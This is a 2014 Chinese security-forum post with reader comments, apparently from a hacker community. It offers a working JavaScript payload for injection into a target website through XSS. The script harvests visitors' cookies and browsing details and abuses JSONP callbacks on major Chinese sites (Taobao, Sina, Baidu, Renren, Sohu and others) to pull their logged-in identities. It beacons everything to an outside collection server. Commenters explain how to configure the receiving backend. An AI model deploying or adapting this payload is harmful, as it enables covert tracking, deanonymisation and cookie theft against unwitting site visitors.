JSON探针—定位目标网络虚拟信息身份
Jacks | 2014-11-06 00:03
11月啦,放点东西出来 给wooyun的伙伴们分享下,其实这个技术已经很成熟啦.不过还是有不知道的童鞋吧。
BTW看了看我的注册时间,数数手指也有3年近4年的样子啦...也见证了wooyun的成长过程.
从当初的rank榜单top10到现在,感叹,弹指一挥间..不过我相信在wooyun这个平台上的帽子们,无论白帽黑帽,只要是会捉老鼠的都是好帽,所以说,我坚信,大家做一件事情,都不忘初衷...坚持!废话是不是很多?哈哈..
看看下面部分的核心代码,我也就贴部分啦,其实实现起来很Easy,需要一个后端去接收。
它的用处呢,标题大家也看到了,至于能扩展到什么程度,怎么使用,那就看大家的思路啦。。。
window.onerror=function(){ return true; } http_server = "http://lemon.1nlab.com/index.php?do=api&id=lemon&content="; var info = {}; info.browser = function(){ ua = navigator.userAgent.toLowerCase(); var rwebkit = /(webkit)[ \/]([\w.]+)/; var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/; var rmsie = /(msie) ([\w.]+)/; var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/; var match = rwebkit.exec( ua ) || ropera.exec( ua ) || rmsie.exec( ua ) || ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || []; return { name: match[1] || "", version: match[2] || "0" }; }(); info.url = document.location.href; info.ua = escape(navigator.userAgent); info.lang = navigator.language; info.referrer = document.referrer; info.location = window.location.href; info.toplocation = top.location.href; info.cookie = escape(document.cookie); info.domain = document.domain; info.title = document.title; info.screen = function(){ var c = ""; if (self.screen) { c = screen.width+"x"+screen.height; } return c; }(); info.flash = function(){ var f="",n=navigator; if (n.plugins && n.plugins.length) { for (var ii=0;ii<n.plugins.length;ii++) { if (n.plugins[ii].name.indexOf('Shockwave Flash')!=-1) { f=n.plugins[ii].description.split('Shockwave Flash ')[1]; break; } } } else if (window.ActiveXObject) { for (var ii=10;ii>=2;ii--) { try { var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');"); if (fl) { f=ii + '.0'; break; } } catch(e) {} } } return f; }(); function inj_script(a, b) { var o = document.createElement("script"); o.src = a; if (b) { if (!window.ActiveXObject) { o.onload = b; } else { o.onreadystatechange = function () { if (o.readyState == 'loaded' || o.readyState == 'complete') { b(); } } } } document.getElementsByTagName("body")[0].appendChild(o); return o; } function json2str(o) { if(typeof o == 'string') return o; var arr = []; var fmt = function(s) { if (typeof s == 'object' && s != null) return json2str(s); return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s; } for (var i in o) arr.push("'" + i + "':" + fmt(o[i])); return '{' + arr.join(',') + '}'; } video_login_callback = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=baidu"; } e163_comment = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=163"; } sina_1368631232407449 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=sina"; } loginInfoJson = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=taobao"; } jsonp1368705676193 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=mop"; } jsonp1368751970360 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=dangdang"; } jQuery1368758656634 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=renren"; } window.onload = function(){ new Image().src = http_server + escape(json2str(info)) + "&content2=info%20"; try{ inj_script('http://baike.baidu.com/api/login/?callback=video_login_callback'); } catch(e){} try{ inj_script('http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment'); } catch(e){} try{ inj_script('http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449'); } catch(e){} try{ inj_script('http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713'); } catch(e){} try{ inj_script('http://passport.mop.com/common/user-info?callback=jsonp1368705676193'); } catch(e){} try{ inj_script('http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360'); } catch(e){} try{ inj_script('http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639'); } catch(e){} try{ inj_script('http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1361671333278'); } catch(e){} try{ inj_script('http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368893252433&var=tianya_msg'); } catch(e){} setTimeout(function(){ var o = [_passport]; new Image().src = http_server + escape(json2str(o)) + "&content2=sohu"; } ,3000); setTimeout(function(){ var o = tianya_msg.data.list[0].toUserName+'|'+tianya_msg.data.list[0].toUserId; new Image().src = http_server + escape(json2str(o)) + "&content2=tianya"; } ,5000); };
我就不逐行去做解释了,大家可以看到里面有很多国内的大型SNS站点,购物站,等等。
这里你可以自定义添加你想要的,然后呢,你把这段代码注入到目标网站上,那么访问者访问以后。
假设他之前有访问过这些代码里面自定义的网站,比如baidu空间,当当网,新浪微博,淘宝,等等网站。
那么他之前的登陆信息就会被我们截获到,并且记录到我们的后台。也就是最开始那段http_server那个地址里面去... 好了,洗洗睡了。。。欢迎各位 拍砖...
核总点评:
其实原理很简单,利用大量三方网站的cookie进行个人信息追踪,例如各种购物网站广告匹配机制,分析你各种喜好,推送符合你的广告,我们调用这些接口就可以获得很多意想不到的信息,例如目标年龄段、性别、体型、个人喜好等信息(各大广告公司一直在做,例如百度联盟、谷歌广告),或者干脆直接调用各大网站的登录接口,获取一些callback的用户登陆账号信息,类似以前的:注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪
各种吐槽:
1#
党中央 | 2014-11-06 00:15
感谢楼主分享
2#
Mixes | 2014-11-06 01:12
突然想起以前总有人回复加图片…
3#
大白菜 (YY ID 71686265) | 2014-11-06 01:26
。。。。。。。。。。秒懂了
4#
Ricter (j0j0) | 2014-11-06 10:02
部分失效了..这是利用了callback的信息泄露吧..
思路不错=口=
5#
cnrstar (Be My Personal Best!) | 2014-11-06 10:04
jshijacking啊,这种要找猥琐牛,各种姿势,哈哈哈
6#
AZ0NE (www.azone.asia) | 2014-11-06 11:53
求php端源码
7#
RainShine (I Hate You;̷̸̨̀͒̏̃ͦ̈́̾̀́̎͢҉̵̶͚̼͉͖̺̥͔͇̰̹̮͙͉̻̼̭̻͕̮͇ͨͬͪ͗̇̑̽͋̀̋̊͌ͧͨͭ̓̅͐ͥ̂̔̊ͧ͊҉̶̵̷̞̩̦̳̺̳̬̬̩̣̫͇̯̥͖͍͕̠̦̼̗ͯ̽͌̔ͪͯ́́͋̍ͨ̿̿̎͒ͤ̓̅̀͂ͧ͋̏ͫͣ̔͘͜͠͏̶̥̺͓̘̺ͮͧͫ͂͒ͤͣ͘̚ ͇) | 2014-11-06 13:20
膜拜元老……@那个叫什么深蓝的逗比
8#
爱捣蛋的鬼 | 2014-11-06 13:34
xss危害还是很大
9#
梧桐雨 (ofni.uygnotuw) | 2014-11-06 13:40
好东西,感谢lz。
10#
Chu (学习ing。) | 2014-11-06 13:55
咱思路
11#
Chu (学习ing。) | 2014-11-06 13:55
赞...
12#
八云幽紫 | 2014-11-06 14:14
@Ricter @AZ0NE 看到好多熟人
13#
我勒个去 | 2014-11-06 14:27
早已有:)Thx anyway
14#
微信公众号 | 2014-11-06 14:34
t各种猥琐
15#
Fireweed | 2014-11-06 14:42
赞思路
16#
老和尚 (坐镇乌云,秒杀库带,放荡威客,侵袭TSRC。) | 2014-11-06 14:58
没看懂!!点了个喜欢,回家研究去
17#
AZ0NE (www.azone.asia) | 2014-11-06 15:07
@八云幽紫 大白露
18#
Jacks | 2014-11-06 16:34
@我勒个去 你为何弄个马甲?我知道你是谁,233333
19#
我勒个去 | 2014-11-06 17:04
@Jacks 呵呵,在wooyun上就是这个ID啊,何来马甲一说
20#
Jacks | 2014-11-06 17:17
@我勒个去 嘿嘿,你是xiaoyu吗? 还在 baidu?
21#
xsser (十根阳具有长短!!) | 2014-11-06 17:39
曾经的top 10
22#
Jumbo | 2014-11-06 18:00
突然想起以前总有人回复加图片…
23#
Jumbo | 2014-11-06 18:01
这是js文件吗。然后注入xss.js?
24#
Jacks | 2014-11-06 18:24
@xsser 唔乖晒. Jancnock总的WB,哈哈,, 正在发愁木有WB 去申请众测咧.
25#
CHForce (带马师) | 2014-11-07 09:40
very good,非常有意思的过程。
26#
哎呦小贼 | 2014-11-07 09:42
有何利用价值
27#
我勒个去 | 2014-11-07 10:03
@Jacks 索性我就多说一点。可以考虑把flash的也结合一部分进去,JAVA算是废了,没意思。同时在思路方面也可以不局限于hijack之类的,参考下目前营销号如何做精准营销的,比如我怎么知道你的QQ?呵呵
28#
secer | 2014-11-07 10:30
jsonp 大法好
29#
博丽灵梦 (啊 我中枪了) | 2014-11-07 10:44
好东西
30#
笔墨 (来人呐笔墨伺候!) | 2014-11-07 11:46
多谢!
31#
YwiSax | 2014-11-07 14:29
之前有人搞了某大站,被管理员在shell里插了这个。。。然后被抓了,哈哈哈
32#
Marsevil (ฏ๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎ด้้้้้็็) | 2014-11-07 14:48
@YwiSax 鹳狸猿简直机智
33#
sdj (男人分三种,第一种是用假名牌来掩饰身份,第二种是用真名牌类衬托身份,而第三种,则是用身份来衬托身上的假名牌。) | 2014-11-07 20:54
@YwiSax 杜撰性略高啊,我觉的能搞大站的基本操作一直都是在干净的虚拟机里操作的。
34#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-11-08 01:54
其实原理很简单,利用大量三方网站的cookie进行个人信息追踪,例如各种购物网站广告匹配机制,分析你各种喜好,推送符合你的广告,我们调用这些接口就可以获得很多意想不到的信息,例如目标年龄段、性别、体型、个人喜好等信息(各大广告公司一直在做,例如百度联盟、谷歌广告),或者干脆直接调用各大网站的登录接口,获取一些callback的用户登陆账号信息,类似以前的:注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪
35#
小森森 (学习中……) | 2014-11-08 05:34
百度百科这个漏得挺厉害的……
36#
abaddon (我就认识这几个字母因此取了这名字) | 2014-11-08 07:02
@核攻击 我浏览人家招生网站 糊里糊涂就进去了
真实IP 不会被查水表吧 ....
37#
nony (Not do is die...) | 2014-11-13 22:33
接收端怎么定义呢?
38#
Jacks | 2014-11-13 22:44
@nony http_server = 有例
39#
nony (Not do is die...) | 2014-11-13 22:48
@Jacks 呜呜 不知道怎么配置啊 求详细
40#
nony (Not do is die...) | 2014-11-13 22:49
@Jacks http_server 这个我可以在xss平台里面配置吗?
41#
xiaoxin | 2014-11-14 00:03
@nony http_server= 'http://xxx/index.php?do=api&id={projectId}&content=';
配置里记得接受content,content2两个参数
42#
nony (Not do is die...) | 2014-11-14 02:39
@xiaoxin ok 已经测试完毕
43#
noob (漏洞深不可测#&8238) | 2014-11-26 14:40
猥琐好姿势,get了
44#
B1uH4ck | 2014-11-26 15:25
核总解释的。。。。。好。
相关内容:
社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人
逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件
论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统
跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费?
APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密
黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神
女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹
多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己
基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线?
揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息
一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱
如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪?
江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡
支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱
个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷
关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己
浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉
【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工
俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据
保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹
XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录
探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万
由“正方”jiam、jiemi之逆向思及Base64之逆编码表
您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗!
关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料?
伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙!
【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘!
全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范)
金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币
谈谈时事:电话“诈”弹导致多地机场飞机被迫返航,论如何打电话不被追踪
逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本
娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩
全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下))
全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下)
全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中))
全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上))
全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上))
求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡
如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码
银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款?
注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪
为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术?
一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网
(视频)USRP 来Sniffing 无线键盘,27Mhz keyboard sniffing
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞
分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中...
分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中...
分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中...
超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她
讨论如何通过航空飞机的互联网入侵、劫持飞机上的乘客,入侵劫持卫星
R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B)
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹ADS-B/TCAS/SSR
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR
电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点
户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)
上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件!
再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人”
GNU Radio USRP OpenBTS 小区短信 区域短信
一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截
上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼!
360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花
周末湖边 Sniffing ADS-B,Hack 私人小型机场
淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店
核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程!
追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理!
服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码
公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析
Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入
android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护
关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论
远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击
追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者
dSploit—Android网络渗透套件测试小记(含视频)
实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump)
美国极超音速飞机90分钟飞越半球,时速可达4000千米,飞行在太空边缘
视频:FPSRussia的俄式军火秀 遥控武装四桨直升机[中英双语字幕]
视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍……
Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班
《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息
简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器
Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗
iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号
找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置
德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机
【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的!
802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks
刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客
从技术角度深入剖析:改号软件,电话号码任意显示,伪造来电显示
华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕
视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播
利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备
电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍?
任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己?
视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步!
Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击
用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位
不要偷黑客的东西 - Why you don't steal from a hacker
【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面!
美国“末日飞机”曝光 面临大灾难可保护首脑 可抗核武器袭击、核辐射
留言评论(旧系统):